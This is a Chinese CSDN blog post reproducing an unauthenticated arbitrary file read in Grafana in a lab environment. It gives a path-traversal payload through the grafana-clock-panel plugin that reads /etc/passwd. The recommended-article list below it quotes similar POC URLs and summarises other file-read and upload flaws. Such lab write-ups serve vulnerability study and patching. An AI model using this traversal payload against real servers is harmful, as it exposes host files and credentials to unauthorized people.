Grafana 未授权任意文件读取

最新推荐文章于 2024-05-16 11:58:33 发布
最新推荐文章于 2024-05-16 11:58:33 发布
阅读量656 收藏
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45770644/article/details/121771838
版权

前言:

Grafana是一个跨平台的开源的度量分析和可视化工具,可以通过将采集的数据查询然后可视化的展示,并及时通知。

漏洞复现:

打开靶场环境

http://ip:3000/login

直接访问地址,抓包插入payload:

/public/plugins/grafana-clock-panel/../../../../../../etc/passwd

 漏洞危害

攻击者可通过该漏洞在未经身份验证的情况下读取主机上的任意文件。

具体修复方式详情参考链接:

【安全通报】Grafana 未授权任意文件读取 0day 漏洞|NOSEC安全讯息平台 - 白帽汇安全研究院

Teamss
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Grafana 授权任意文件读取漏洞复现(CVE-2021-43798 )
千寻的博客
12-16 3469
文章目录漏洞名称漏洞编号漏洞描述影响版本fofa漏洞点复现步骤修复建议参考链接免责声明 漏洞名称 Grafana 授权任意文件读取 漏洞编号 CVE-2021-43798 漏洞描述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台,用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。 Grafana 存在授权任意文件读取漏洞,攻击者在经身份验证的情况下可通过该漏洞读取主机上的任意文件。 影响版本 Grafana 8.x fofa app
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
Grafana授权任意文件读取
Amateur
12-08 401
CVE-2021-43798 漏洞描述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。 Grafana 存在授权任意文件读取漏洞,攻击者在经身份验证的情况下可通过该漏洞读取主机上的任意文件。 该漏洞危害等级:高危 影响范围 经测试,目前最新版本(Grafana v8.2.6)仍存在漏洞。 根据目前FOFA系统最新数据(一年内数据),显示全球范围内(app=“Grafana”)共有 234,937 个相关服务对外
CVE-2021-43798——Grafana 授权任意文件读取_grafana授权访问(1)
2301_82241775的博客
05-16 373
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
CVE-2021-43798——Grafana 授权任意文件读取
热门推荐
LiBai'S BLOG
12-18 1万+
Grafana 授权任意文件读取~
Laykefu客服系统 任意文件上传漏洞,2024年最新34岁程序员年薪50w
2401_83739632的博客
04-15 344
Laykefu客服系统/admin/users/upavatar.html接口处存在文件上传漏洞,而且当请求头中Cookie中的”user_name“不为空时即可绕过登录系统后台,恶意攻击者可利用此问题,上传后门文件,获取服务器权限。Laykefu 是一款基于workerman+gatawayworker+thinkphp5搭建的全功能webim客服系统,旨在帮助企业有效管理和提供优质的客户服务。
[文件读取]Grafana授权任意文件读取
wj33333的博客
11-14 427
描述: Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。Grafana 存在授权任意文件读取漏洞,攻击者在经身份验证的情况下可通过该漏洞读取主机上的任意文件。查看etc/passwd。查看/tmp/flag。
泛微云桥 e-Bridge 任意文件读取.md
04-11
泛微云桥 e-Bridge 任意文件读取
nc57-任意文件读取漏洞补丁
06-08
【标题】"nc57-任意文件读取漏洞补丁" 涉及的是一个针对NC57软件的安全问题,该补丁旨在修复一个可能导致任意文件读取的漏洞。在网络安全领域,这样的漏洞通常是非常严重的问题,因为它允许攻击者授权访问系统上...
Adminer≤4.6.2任意文件读取漏洞1
08-03
当Adminer正确处理此命令时,攻击者可以利用它来读取目标系统的任意文件。具体来说,攻击者可以通过构造特定的SQL查询来触发文件读取。Adminer 4.6.3之后的版本已经修复了这个问题,限制了`LOAD DATA LOCAL INFILE...
MrWQ#vulnerability-paper#若依 CMS 0day 任意文件读取 or 授权访问1
07-25
文章来源:Khan 安全攻防实验室若依管理系统后台任意文件读取若依管理系统授权访问。
vulhub系列】CVE-2021-43798 Grafana授权任意文件读取复现
Wiofgb的博客
08-17 1136
记录一次CVE-2021-43798 Grafana授权任意文件读取复现
CVE-2021-43798——Grafana 授权任意文件读取_grafana授权访问(2)
最新发布
2401_84519859的博客
05-16 443
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
Grafana 授权任意访问漏洞(CVE-2022-32275)
murphysec的博客
06-08 9467
CVE-2022-32275漏洞是由于Grafana存在授权访问漏洞,攻击者可以通过特定url,访问任意用户系统界面及读取任意文件。该漏洞影响范围一般。该问题已在新版本中修复,建议用户更新到最新版本。参考链接:https://nvd.nist.gov/vuln/detail/CVE-2022-32275 MISC:https://github.com/BrotherOfJhonny/grafana/blob/main/README.md       【使用墨菲安全的开源工具帮您快速检测代码安全】 墨菲安全
Grafana任意文件读取
Cobra的博客
12-08 4970
Grafana任意文件读取 漏洞描述 Grafana存在任意文件读取漏洞,通过默认存在的插件,可构造特殊的请求包读取服务器任意文件 影响版本 Grafana 8.x 漏洞复现 POC HTTP://XXX.XXX.XXX.XXX/public/plugins/插件名称/../../../../../../../../../etc/passwd 检测脚本 import requests import sys args = str(sys.argv[1]) f = open("./
CVE-2021-43798 Grafana任意文件读取复现
weixin_46137328的博客
01-09 1330
0x00 概述Grafana是一个完全开源的度量分析与可视化平台,可对来自各种各种数据源的数据进行查询、分析、可视化处理以及配置告警。Grafana读取文件接口存在授权,且文件地址...
Grafana 授权任意文件读取 0day 漏洞复现
yoyo_573的博客
12-21 2934
Grafana 授权任意文件读取 0day 漏洞
开源漏洞深度分析|CVE-2022-38370 Apache IoTDB grafana-connector 模块授权漏洞
LJQClqjc的博客
09-08 975
开源漏洞深度分析|CVE-2022-38370 Apache IoTDB grafana-connector 模块授权漏洞
shopxo download 任意文件读取漏洞
09-02
然而,它也存在一些安全漏洞,包括任意文件读取漏洞。这个漏洞可能会使攻击者能够读取服务器上的任意文件,包括敏感的配置文件和用户数据。 要利用shopxo download任意文件读取漏洞,攻击者通常会构造特定的URL请求...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值